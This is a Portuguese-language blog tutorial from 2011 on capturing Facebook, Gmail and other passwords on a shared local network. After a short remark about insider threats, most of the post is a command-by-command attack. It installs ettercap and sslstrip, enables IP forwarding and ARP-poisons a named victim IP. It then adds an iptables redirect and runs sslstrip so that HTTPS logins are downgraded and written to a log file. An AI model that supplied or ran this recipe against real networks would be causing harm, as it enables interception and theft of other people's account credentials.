Como capturar senhas do Facebook, Gmail, Twitter…

By | 16 de novembro de 2011

     Muitas vezes preocupamos muito com as invasões e ataques provenientes da Internet para nossa rede local. Porém as vezes o perigo pode estar mais próximo do que imaginamos. Cerca de 70% dos ataques são feitos a partir da rede interna. Por isso senhas absurdamente complexas aliada á algum outro meio de autenticação torna-se quase que obrigatório para uma rede Wireless. Neste pequeno tutorial veremos como um invasor pode capturar informações até mesmo consideradas como seguras e criptografadas.

     Desde já aviso: Não é simples e requer um conhecimento razoável na área, mas creio que funcione seguindo como “receita de bolo”.

 Requisitos:

  • Computador com sistema operacional Linux (neste caso usarei o Fedora 15) conectado na mesma rede da vítima.

  • Conexão com a Internet;

  • Conhecimento intermediário em Redes/Linux.

     O ataque é baseado no envenenamento da tabela ARP da vítima. Com isso, todo tráfego que a vítima enviará ao roteador será interceptado. Vamos usar menos teoria e mais prática:

 

Cenário:

  • IP da vítima: 192.168.0.67
  • IP do roteador: 192.168.0.1

 

     Passo 1 – Baixar e Instalar pacotes

 Executar (sempre como root) os comandos abaixo:

 # yum -y install ettercap python-twisted-web

# tar xvfz sslstrip-0.9.tar.gz

# cd sslstrip-0.9

# python setup.py install && ln -s /usr/local/bin/sslstrip /bin/sslstrip

 

     Passo 2 – Atacar a vítima

      O primeiro passo é habilitar o encaminhamento de pacotes, utilizar o seguinte comando:

 # echo 1 > /proc/sys/net/ipv4/ip_forward

      Para envenenar a tabela ARP da vítima, iremos utilizar o Ettercap. Executar o seguinte comando:

 # ettercap -Tq -i eth0 -M arp:remote,oneway /IP-da-vitima/ /IP-do-roteador/

      No meu caso, ficou dessa forma:

 # ettercap -Tq -i eth0 -M arp:remote,oneway /192.168.0.67/ /I92.168.0.1/

      Desta forma, todo o tráfico já é interceptado, e é possível capturar senhas não criptografadas com o Wireshark, por exemplo, como no print abaixo:

       Mas e as senhas criptografadas? Para elas vamos utilizar o Sslstrip, que faz uma espécie de “proxy”, fazendo a leitura das páginas https e convertendo-as para http. Para acioná-lo executar os passos abaixo:

# iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 8080

# sslstrip -l 8080 -w /root/log.txt

     Pronto! Todos as requisições https ficarão registradas em /root/log.txt. Com isso é possível capturar senhas do Hotmail, MSN, Gmail, Facebook, entre outras. (ver print abaixo).

     Caso queira mais informações, pode ver no artigo original, feito por Ygor Bittencourt, publicado na revista ADMIN, Redes & Segurança, 3° edição. Até mais……